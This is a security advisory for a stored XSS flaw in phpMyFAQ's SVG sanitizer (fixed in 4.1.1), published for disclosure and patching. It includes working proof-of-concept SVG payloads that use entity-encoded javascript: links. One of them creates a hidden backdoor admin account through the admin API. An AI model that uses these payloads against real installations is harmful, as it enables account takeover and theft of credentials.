GHSA-5CRX-PFHQ-4HGG

Vulnerability from github – Published: 2026-04-01 23:42 – Updated: 2026-04-06 17:18
VLAI?
Summary
phpMyFAQ: SVG Sanitizer Bypass via HTML Entity Encoding Leads to Stored XSS and Privilege Escalation
Details

Summary

The regex-based SVG sanitizer in phpMyFAQ (SvgSanitizer.php) can be bypassed using HTML entity encoding in javascript: URLs within SVG <a href> attributes. Any user with edit_faq permission can upload a malicious SVG that executes arbitrary JavaScript when viewed, enabling privilege escalation from editor to full admin takeover.

Details

The file phpmyfaq/src/phpMyFAQ/Helper/SvgSanitizer.php (introduced 2026-01-15) uses regex patterns to detect dangerous content in uploaded SVG files. The regex for javascript: URL detection is:

/href\s*=\s*["\']javascript:[^"\']*["\']/i

This pattern matches the literal string javascript: but fails when the URL is HTML entity encoded. For example, &#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58; decodes to javascript: in the browser, but does NOT match the regex. The isSafe() method returns true, so the SVG is accepted without sanitization.

Additionally, the DANGEROUS_ELEMENTS blocklist misses <animate>, <set>, and <use> elements which can also be used to execute JavaScript in SVG context.

Uploaded SVG files are served with Content-Type: image/svg+xml and no Content-Disposition: attachment header, so browsers render them inline and execute any JavaScript they contain.

The image upload endpoint (/admin/api/content/images) only requires the edit_faq permission — not full admin — so any editor-level user can upload malicious SVGs.

PoC

Basic XSS (confirmed working in Chrome 146 and Edge)

  1. Login to phpMyFAQ admin panel with any account that has edit_faq permission
  2. Navigate to Admin → Content → Add New FAQ
  3. In the TinyMCE editor, click the image upload button
  4. Upload this SVG file:
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 200 200">
  <a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(document.domain)">
    <text x="20" y="50" font-size="16" fill="red">Click for XSS</text>
  </a>
</svg>
  1. The SVG is uploaded to /content/user/images/<timestamp>_<filename>.svg
  2. Open the SVG URL directly in a browser
  3. Click the red text → alert(document.domain) executes

Privilege Escalation (Editor → Admin Takeover)

  1. As editor, upload this SVG:
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 300">
  <rect width="500" height="300" fill="#f8f9fa"/>
  <text x="250" y="100" text-anchor="middle" font-size="22" fill="#333">📋 System Notice</text>
  <a href="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;fetch('/admin/api/user/add',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({userName:'backdoor',userPassword:'H4ck3d!',realName:'System',email:'evil@attacker.com','is-visible':false}),credentials:'include'}).then(r=>r.json()).then(d=>document.title='pwned')">
    <rect x="150" y="170" width="200" height="50" rx="8" fill="#0d6efd"/>
    <text x="250" y="200" text-anchor="middle" font-size="16" fill="white">View Update →</text>
  </a>
</svg>
  1. Send the SVG URL to an admin
  2. Admin opens URL, clicks "View Update →"
  3. JavaScript creates backdoor admin user backdoor:H4ck3d!
  4. Attacker logs in as backdoor with full admin privileges

Impact

This is a Stored Cross-Site Scripting (XSS) vulnerability that enables privilege escalation. Any user with edit_faq permission (editor role) can upload a weaponized SVG file. When an admin views the SVG, arbitrary JavaScript executes in their browser on the phpMyFAQ origin, allowing the attacker to: - Create backdoor admin accounts via the admin API - Exfiltrate phpMyFAQ configuration (database credentials, API tokens) - Modify or delete FAQ content - Achieve full admin account takeover The vulnerability affects all phpMyFAQ installations using the SvgSanitizer class (introduced 2026-01-15). Recommended fix: replace regex-based sanitization with a DOM-based allowlist approach, or serve SVG files with Content-Disposition: attachment to prevent inline rendering.

Severity ?
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.1.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "thorsten/phpmyfaq"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34974"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T23:42:47Z",
    "nvd_published_at": "2026-04-02T15:16:51Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe regex-based SVG sanitizer in phpMyFAQ (`SvgSanitizer.php`) can be bypassed using HTML entity encoding in `javascript:` URLs within SVG `\u003ca href\u003e` attributes. Any user with `edit_faq` permission can upload a malicious SVG that executes arbitrary JavaScript when viewed, enabling privilege escalation from editor to full admin takeover.\n\n### Details\nThe file `phpmyfaq/src/phpMyFAQ/Helper/SvgSanitizer.php` (introduced 2026-01-15) uses regex patterns to detect dangerous content in uploaded SVG files. The regex for `javascript:` URL detection is:\n\n`/href\\s*=\\s*[\"\\\u0027]javascript:[^\"\\\u0027]*[\"\\\u0027]/i`\n\nThis pattern matches the literal string `javascript:` but fails when the URL is HTML entity encoded. For example, `\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;` decodes to `javascript:` in the browser, but does NOT match the regex. The `isSafe()` method returns `true`, so the SVG is accepted without sanitization.\n\nAdditionally, the `DANGEROUS_ELEMENTS` blocklist misses `\u003canimate\u003e`, `\u003cset\u003e`, and `\u003cuse\u003e` elements which can also be used to execute JavaScript in SVG context.\n\nUploaded SVG files are served with `Content-Type: image/svg+xml` and no `Content-Disposition: attachment` header, so browsers render them inline and execute any JavaScript they contain.\n\nThe image upload endpoint (`/admin/api/content/images`) only requires the `edit_faq` permission \u2014 not full admin \u2014 so any editor-level user can upload malicious SVGs.\n\n### PoC\n### Basic XSS (confirmed working in Chrome 146 and Edge)\n\n1. Login to phpMyFAQ admin panel with any account that has `edit_faq` permission\n2. Navigate to Admin \u2192 Content \u2192 Add New FAQ\n3. In the TinyMCE editor, click the image upload button\n4. Upload this SVG file:\n\n```xml\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 200 200\"\u003e\n  \u003ca href=\"\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;alert(document.domain)\"\u003e\n    \u003ctext x=\"20\" y=\"50\" font-size=\"16\" fill=\"red\"\u003eClick for XSS\u003c/text\u003e\n  \u003c/a\u003e\n\u003c/svg\u003e\n```\n\n5. The SVG is uploaded to `/content/user/images/\u003ctimestamp\u003e_\u003cfilename\u003e.svg`\n6. Open the SVG URL directly in a browser\n7. Click the red text \u2192 `alert(document.domain)` executes\n\n### Privilege Escalation (Editor \u2192 Admin Takeover)\n\n1. As editor, upload this SVG:\n\n```xml\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 500 300\"\u003e\n  \u003crect width=\"500\" height=\"300\" fill=\"#f8f9fa\"/\u003e\n  \u003ctext x=\"250\" y=\"100\" text-anchor=\"middle\" font-size=\"22\" fill=\"#333\"\u003e\ud83d\udccb System Notice\u003c/text\u003e\n  \u003ca href=\"\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;fetch(\u0027/admin/api/user/add\u0027,{method:\u0027POST\u0027,headers:{\u0027Content-Type\u0027:\u0027application/json\u0027},body:JSON.stringify({userName:\u0027backdoor\u0027,userPassword:\u0027H4ck3d!\u0027,realName:\u0027System\u0027,email:\u0027evil@attacker.com\u0027,\u0027is-visible\u0027:false}),credentials:\u0027include\u0027}).then(r=\u003er.json()).then(d=\u003edocument.title=\u0027pwned\u0027)\"\u003e\n    \u003crect x=\"150\" y=\"170\" width=\"200\" height=\"50\" rx=\"8\" fill=\"#0d6efd\"/\u003e\n    \u003ctext x=\"250\" y=\"200\" text-anchor=\"middle\" font-size=\"16\" fill=\"white\"\u003eView Update \u2192\u003c/text\u003e\n  \u003c/a\u003e\n\u003c/svg\u003e\n```\n\n2. Send the SVG URL to an admin\n3. Admin opens URL, clicks \"View Update \u2192\"\n4. JavaScript creates backdoor admin user `backdoor:H4ck3d!`\n5. Attacker logs in as `backdoor` with full admin privileges\n\n\n### Impact\nThis is a Stored Cross-Site Scripting (XSS) vulnerability that enables privilege escalation. Any user with `edit_faq` permission (editor role) can upload a weaponized SVG file. When an admin views the SVG, arbitrary JavaScript executes in their browser on the phpMyFAQ origin, allowing the attacker to:\n- Create backdoor admin accounts via the admin API\n- Exfiltrate phpMyFAQ configuration (database credentials, API tokens)\n- Modify or delete FAQ content\n- Achieve full admin account takeover\nThe vulnerability affects all phpMyFAQ installations using the `SvgSanitizer` class (introduced 2026-01-15). Recommended fix: replace regex-based sanitization with a DOM-based allowlist approach, or serve SVG files with `Content-Disposition: attachment` to prevent inline rendering.",
  "id": "GHSA-5crx-pfhq-4hgg",
  "modified": "2026-04-06T17:18:58Z",
  "published": "2026-04-01T23:42:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-5crx-pfhq-4hgg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34974"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/thorsten/phpMyFAQ"
    },
    {
      "type": "WEB",
      "url": "https://github.com/thorsten/phpMyFAQ/releases/tag/4.1.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "phpMyFAQ: SVG Sanitizer Bypass via HTML Entity Encoding Leads to Stored XSS and Privilege Escalation"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.